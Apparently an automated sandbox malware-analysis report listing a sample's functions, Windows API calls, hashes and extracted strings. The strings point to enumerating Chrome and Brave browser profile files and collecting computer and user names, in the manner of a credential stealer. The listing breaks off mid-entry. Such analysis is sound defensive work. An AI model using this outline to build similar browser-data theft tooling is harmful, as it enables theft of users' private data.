                                                                                  • Source File: 00000001.00000002.2966797377.00000000008D9000.00000040.00000020.00020000.00000000.sdmp, Offset: 008D9000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_8d9000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                  • String ID:
                                                                                  • API String ID: 3833638111-0
                                                                                  • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                  • Instruction ID: 8ffc3f8a1fd60fd1c4ea775d1234e998db5f7c8924b3067a5c16e87f7cac0b3f
                                                                                  • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                  • Instruction Fuzzy Hash: 5FF062322007156FD7203BF9D88DA6E77ECFF89725F10062AE686D11C0DB70E8454661
                                                                                  Function 00B00E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SetErrorMode.KERNEL32(00000400,?,?,00B00223,?,?), ref: 00B00E19
                                                                                  • SetErrorMode.KERNEL32(00000000,?,?,00B00223,?,?), ref: 00B00E1E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorMode
                                                                                  • String ID:
                                                                                  • API String ID: 2340568224-0
                                                                                  • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                  • Instruction ID: ce57d29500d96b33ae73fd294b2d0a5fe4e8542c7741799118836566479eeeda
                                                                                  • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                  • Instruction Fuzzy Hash: 49D01232645228B7DB003A94DC09BCEBF5CDF09BA2F008461FB0DE9080CBB09A4046EA
                                                                                  Function 004010A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004,?,?,?,0040114E,?,?,00416A1C), ref: 004010B3
                                                                                  • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0,?,?,?,0040114E,?,?,00416A1C), ref: 004010F7
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Virtual$AllocFree
                                                                                  • String ID:
                                                                                  • API String ID: 2087232378-0
                                                                                  • Opcode ID: 8ce35272a596f1cdf5aa55b7e6bb44489e409ba54c945097ad2cb9ba566d6231
                                                                                  • Instruction ID: e05e9ea69c75ff17789b13d2c0695db9e8f3777892ad192db41722de5b6306ee
                                                                                  • Opcode Fuzzy Hash: 8ce35272a596f1cdf5aa55b7e6bb44489e409ba54c945097ad2cb9ba566d6231
                                                                                  • Instruction Fuzzy Hash: F2F052B1681208BBE7109BA4AC49FABB3E8E305B14F301408F500E3380C5319E00CAA4
                                                                                  Function 00401190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 004178E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416A2B), ref: 00417910
                                                                                    • Part of subcall function 004178E0: HeapAlloc.KERNEL32(00000000,?,?,?,00416A2B), ref: 00417917
                                                                                    • Part of subcall function 004178E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0041792F
                                                                                    • Part of subcall function 00417850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417880
                                                                                    • Part of subcall function 00417850: HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417887
                                                                                    • Part of subcall function 00417850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041789F
                                                                                  • ExitProcess.KERNEL32 ref: 004011C6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Heap$Process$AllocName$ComputerExitUser
                                                                                  • String ID:
                                                                                  • API String ID: 1004333139-0
                                                                                  • Opcode ID: beae5ea4bba28d8bcdb6621297b085ccf5731606b7c52db2eb8bbe7634c0c08e
                                                                                  • Instruction ID: 3272f285758621328f1ae990cc0b7bdad84480bea6fe4891c0ce75a2ed71569b
                                                                                  • Opcode Fuzzy Hash: beae5ea4bba28d8bcdb6621297b085ccf5731606b7c52db2eb8bbe7634c0c08e
                                                                                  • Instruction Fuzzy Hash: 72E0C2B999030123DB0433F2AD0AB6B329D5B0538DF04042EFA08D2252FE2CE84085AE
                                                                                  Function 008D9C05 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 008D9C56
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2966797377.00000000008D9000.00000040.00000020.00020000.00000000.sdmp, Offset: 008D9000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_8d9000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AllocVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 4275171209-0
                                                                                  • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                  • Instruction ID: 6ab206784547c052e88c169eb5bf572d42f3064b52d803a340ea844e73fb3fbc
                                                                                  • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                  • Instruction Fuzzy Hash: 61113C79A00208EFDB01DF98CA85E98BBF5EF08351F058195F9889B362D775EA50DF90

                                                                                  Non-executed Functions

                                                                                  Function 004138B0 Relevance: 47.5, APIs: 21, Strings: 6, Instructions: 250filestringCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • wsprintfA.USER32 ref: 004138CC
                                                                                  • FindFirstFileA.KERNEL32(?,?), ref: 004138E3
                                                                                  • lstrcatA.KERNEL32(?,?,?,00000104,?,00000104), ref: 00413935
                                                                                  • StrCmpCA.SHLWAPI(?,00420F70), ref: 00413947
                                                                                  • StrCmpCA.SHLWAPI(?,00420F74), ref: 0041395D
                                                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00413C67
                                                                                  • FindClose.KERNEL32(000000FF), ref: 00413C7C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                                                                  • String ID: !=A$%s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                                                                  • API String ID: 1125553467-817767981
                                                                                  • Opcode ID: 8791cea4fdcc51078b83b32db4eaf7b09dc70f878dd535264430eb58c9f2cac6
                                                                                  • Instruction ID: 6b32dcbabd2ae606338a05af88a65253e6d0136fcb4401239c8972690a9ca057
                                                                                  • Opcode Fuzzy Hash: 8791cea4fdcc51078b83b32db4eaf7b09dc70f878dd535264430eb58c9f2cac6
                                                                                  • Instruction Fuzzy Hash: 45A182B5A40218ABDB20DFA4DC85FEA7379BF45301F04458DB50D96181EB789B84CF66
                                                                                  Function 0040BE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                                                  • FindFirstFileA.KERNEL32(00000000,?,00420B32,00420B2B,00000000,?,?,?,004213F4,00420B2A), ref: 0040BEF5
                                                                                  • StrCmpCA.SHLWAPI(?,004213F8), ref: 0040BF4D
                                                                                  • StrCmpCA.SHLWAPI(?,004213FC), ref: 0040BF63
                                                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0040C7BF
                                                                                  • FindClose.KERNEL32(000000FF), ref: 0040C7D1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                                                  • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                                                                  • API String ID: 3334442632-726946144
                                                                                  • Opcode ID: 0a7976044a15c6e1a47e7bb651738ac5a93916ab5623d5d417d7de4c0f42f271
                                                                                  • Instruction ID: 2d1308125da8926fdde3e90b6322e2b17ae592ee2aa58173b84b0ef8a3c681e1
                                                                                  • Opcode Fuzzy Hash: 0a7976044a15c6e1a47e7bb651738ac5a93916ab5623d5d417d7de4c0f42f271
                                                                                  • Instruction Fuzzy Hash: 4E42B871910104ABCB14FB71DD96EED733DAF44304F40456EB50AA60C1EF389B99CBAA
                                                                                  Function 00414910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • wsprintfA.USER32 ref: 0041492C
                                                                                  • FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                                                                  • StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                                                                                  • StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                                                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                                                                                  • FindClose.KERNEL32(000000FF), ref: 00414B92
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Find$File$CloseFirstNextwsprintf
                                                                                  • String ID: %s\%s$%s\%s$%s\*
                                                                                  • API String ID: 180737720-445461498
                                                                                  • Opcode ID: dd01fc369b5388c5bfb31bfe2d46f2fde17b2a46eb7854bc19da0db36a1e72aa
                                                                                  • Instruction ID: f0ba0eb1991201f306808920aeaa9e90ed650eb79ad5a8a04d265ad4202cf965
                                                                                  • Opcode Fuzzy Hash: dd01fc369b5388c5bfb31bfe2d46f2fde17b2a46eb7854bc19da0db36a1e72aa
                                                                                  • Instruction Fuzzy Hash: E66175B5950218ABCB20EBE0DC45FEA73BDBB49700F40458DB50996181EB74EB85CF95
                                                                                  Function 00B13B17 Relevance: 31.8, APIs: 21, Instructions: 250filestringCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • wsprintfA.USER32 ref: 00B13B33
                                                                                  • FindFirstFileA.KERNEL32(?,?), ref: 00B13B4A
                                                                                  • lstrcat.KERNEL32(?,?), ref: 00B13B9C
                                                                                  • StrCmpCA.SHLWAPI(?,00420F70), ref: 00B13BAE
                                                                                  • StrCmpCA.SHLWAPI(?,00420F74), ref: 00B13BC4
                                                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00B13ECE
                                                                                  • FindClose.KERNEL32(000000FF), ref: 00B13EE3
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                                                                  • String ID:
                                                                                  • API String ID: 1125553467-0
                                                                                  • Opcode ID: 4559a2751c43def235363665869aa0b92e5680d670ebeacc1df313f03f1736d8
                                                                                  • Instruction ID: ffba857d1c798b2ec2c7b480b358723ee74eccd0aa46dc6fa2e8b2a256de3e53
                                                                                  • Opcode Fuzzy Hash: 4559a2751c43def235363665869aa0b92e5680d670ebeacc1df313f03f1736d8
                                                                                  • Instruction Fuzzy Hash: 9CA171B6A40218ABDB34DFA4CC85FEE73B9FB49700F4445C8A50D96181EB759B84CF62
                                                                                  Function 00414570 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00414580
                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 00414587
                                                                                  • wsprintfA.USER32 ref: 004145A6
                                                                                  • FindFirstFileA.KERNEL32(?,?), ref: 004145BD
                                                                                  • StrCmpCA.SHLWAPI(?,00420FC4), ref: 004145EB
                                                                                  • StrCmpCA.SHLWAPI(?,00420FC8), ref: 00414601
                                                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0041468B
                                                                                  • FindClose.KERNEL32(000000FF), ref: 004146A0
                                                                                  • lstrcatA.KERNEL32(?,00906250,?,00000104), ref: 004146C5
                                                                                  • lstrcatA.KERNEL32(?,0090A150), ref: 004146D8
                                                                                  • lstrlenA.KERNEL32(?), ref: 004146E5
                                                                                  • lstrlenA.KERNEL32(?), ref: 004146F6
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Find$FileHeaplstrcatlstrlen$AllocCloseFirstNextProcesswsprintf
                                                                                  • String ID: %s\%s$%s\*
                                                                                  • API String ID: 13328894-2848263008
                                                                                  • Opcode ID: 6e0b2a7f719afdb9f67bf6bddbb53f06d515f99307fed51ad2247f5638f38586
                                                                                  • Instruction ID: 82eaf0d031878973a8df5e9a00467f3300e65aa4f81b4767f6d66ede98fc483b
                                                                                  • Opcode Fuzzy Hash: 6e0b2a7f719afdb9f67bf6bddbb53f06d515f99307fed51ad2247f5638f38586
                                                                                  • Instruction Fuzzy Hash: 195177B5950218ABC720EBB0DC89FEE737DAB54304F40458DB60996190EB789BC58F96
                                                                                  Function 00B0C0D7 Relevance: 26.2, APIs: 17, Instructions: 675fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00B1A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B1A9EF
                                                                                    • Part of subcall function 00B1AB87: lstrcpy.KERNEL32(00000000,?), ref: 00B1ABD9
                                                                                    • Part of subcall function 00B1AB87: lstrcat.KERNEL32(00000000), ref: 00B1ABE9
                                                                                    • Part of subcall function 00B1AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B1AC2C
                                                                                    • Part of subcall function 00B1AC17: lstrcpy.KERNEL32(00000000), ref: 00B1AC6B
                                                                                    • Part of subcall function 00B1AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B1AC79
                                                                                    • Part of subcall function 00B1AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B1AB6C
                                                                                  • FindFirstFileA.KERNEL32(00000000,?,00420B32,00420B2B,00000000,?,?,?,004213F4,00420B2A), ref: 00B0C15C
                                                                                  • StrCmpCA.SHLWAPI(?,004213F8), ref: 00B0C1B4
                                                                                  • StrCmpCA.SHLWAPI(?,004213FC), ref: 00B0C1CA
                                                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00B0CA26
                                                                                  • FindClose.KERNEL32(000000FF), ref: 00B0CA38
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                                                  • String ID:
                                                                                  • API String ID: 3334442632-0
                                                                                  • Opcode ID: da467dc7648e693f4c6cd575beccc027074fc99b58ba44c993b0283215006001
                                                                                  • Instruction ID: bcad225375d4edbb1cee6f105564f96f133e5f74665f9b4fe01d46203b668b26
                                                                                  • Opcode Fuzzy Hash: da467dc7648e693f4c6cd575beccc027074fc99b58ba44c993b0283215006001
                                                                                  • Instruction Fuzzy Hash: A64223729111049BCB18FBA0DD96EED77B9AF54300F8045DCB50AA6191EF34AF88CB92
                                                                                  Function 00413EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • wsprintfA.USER32 ref: 00413EC3
                                                                                  • FindFirstFileA.KERNEL32(?,?), ref: 00413EDA
                                                                                  • StrCmpCA.SHLWAPI(?,00420FAC), ref: 00413F08
                                                                                  • StrCmpCA.SHLWAPI(?,00420FB0), ref: 00413F1E
                                                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0041406C
                                                                                  • FindClose.KERNEL32(000000FF), ref: 00414081
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Find$File$CloseFirstNextwsprintf
                                                                                  • String ID: %s\%s
                                                                                  • API String ID: 180737720-4073750446
                                                                                  • Opcode ID: 08d8b5707085556954652948dce7410593c86d1cefa4e3426e9ef0f3fe249a5a
                                                                                  • Instruction ID: d668781d41669175768d5c9beeab67687ce79b442868c28804f29fd14ebf2a74
                                                                                  • Opcode Fuzzy Hash: 08d8b5707085556954652948dce7410593c86d1cefa4e3426e9ef0f3fe249a5a
                                                                                  • Instruction Fuzzy Hash: 475173B6910218BBCB24FBB0DC85FEA737DBB48304F40458DB61996180EB79DB858F95
                                                                                  Function 00B147D7 Relevance: 22.6, APIs: 15, Instructions: 137stringmemoryfileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00B147E7
                                                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00B147EE
                                                                                  • wsprintfA.USER32 ref: 00B1480D
                                                                                  • FindFirstFileA.KERNEL32(?,?), ref: 00B14824
                                                                                  • StrCmpCA.SHLWAPI(?,00420FC4), ref: 00B14852
                                                                                  • StrCmpCA.SHLWAPI(?,00420FC8), ref: 00B14868
                                                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00B148F2
                                                                                  • FindClose.KERNEL32(000000FF), ref: 00B14907
                                                                                  • lstrcat.KERNEL32(?,0064A524), ref: 00B1492C
                                                                                  • lstrcat.KERNEL32(?,0064A22C), ref: 00B1493F
                                                                                  • lstrlen.KERNEL32(?), ref: 00B1494C
                                                                                  • lstrlen.KERNEL32(?), ref: 00B1495D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                                                                  • String ID:
                                                                                  • API String ID: 671575355-0
                                                                                  • Opcode ID: 30bce43db2ecf0344ca22bb06d90d35447f3f69f35e59fe64c42277d0c46a2d3
                                                                                  • Instruction ID: add04ca7891d0539342893374a2169aa435a02c869187e572cee219304b3d1a5
                                                                                  • Opcode Fuzzy Hash: 30bce43db2ecf0344ca22bb06d90d35447f3f69f35e59fe64c42277d0c46a2d3
                                                                                  • Instruction Fuzzy Hash: 895163B5580218ABCB24EBB0DD89FEE77BDEB58700F4045D8B60992190EB759BC4CF91
                                                                                  Function 00B14107 Relevance: 18.1, APIs: 12, Instructions: 133fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • wsprintfA.USER32 ref: 00B1412A
                                                                                  • FindFirstFileA.KERNEL32(?,?), ref: 00B14141
                                                                                  • StrCmpCA.SHLWAPI(?,00420FAC), ref: 00B1416F
                                                                                  • StrCmpCA.SHLWAPI(?,00420FB0), ref: 00B14185
                                                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00B142D3
                                                                                  • FindClose.KERNEL32(000000FF), ref: 00B142E8
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Find$File$CloseFirstNextwsprintf
                                                                                  • String ID:
                                                                                  • API String ID: 180737720-0
                                                                                  • Opcode ID: 1ae905db5480c4bbf44b7bf6a61368e664d5da2e6ab4683df7d46ab6fe3d119e
                                                                                  • Instruction ID: b6259c50529b8a62591d1782dbde16c6c18d65cd3fc772beb9ffac547231c1c3
                                                                                  • Opcode Fuzzy Hash: 1ae905db5480c4bbf44b7bf6a61368e664d5da2e6ab4683df7d46ab6fe3d119e
                                                                                  • Instruction Fuzzy Hash: 535163B5940218BBCB24FBB0DD85EEA77BDFB54300F4045C9B64992080DB75ABC58F95
                                                                                  Function 0040ED20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • wsprintfA.USER32 ref: 0040ED3E
                                                                                  • FindFirstFileA.KERNEL32(?,?), ref: 0040ED55
                                                                                  • StrCmpCA.SHLWAPI(?,00421538), ref: 0040EDAB
                                                                                  • StrCmpCA.SHLWAPI(?,0042153C), ref: 0040EDC1
                                                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0040F2AE
                                                                                  • FindClose.KERNEL32(000000FF), ref: 0040F2C3
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Find$File$CloseFirstNextwsprintf
                                                                                  • String ID: %s\*.*
                                                                                  • API String ID: 180737720-1013718255
                                                                                  • Opcode ID: 17c01f8448e3f6aceff949048b193885a00d9ad3e9dcc46d8aed4f84564bc9ce
                                                                                  • Instruction ID: 3007dda49b16e6c87372febce5c45cbfe381bf5ef72a3521d52464c3f4e34f22
                                                                                  • Opcode Fuzzy Hash: 17c01f8448e3f6aceff949048b193885a00d9ad3e9dcc46d8aed4f84564bc9ce
                                                                                  • Instruction Fuzzy Hash: 41E13571912118AADB14FB61CD51EEE7338AF54314F4045EEB40A62092EF386FDACF69
                                                                                  Function 0040DE10 Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 370fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
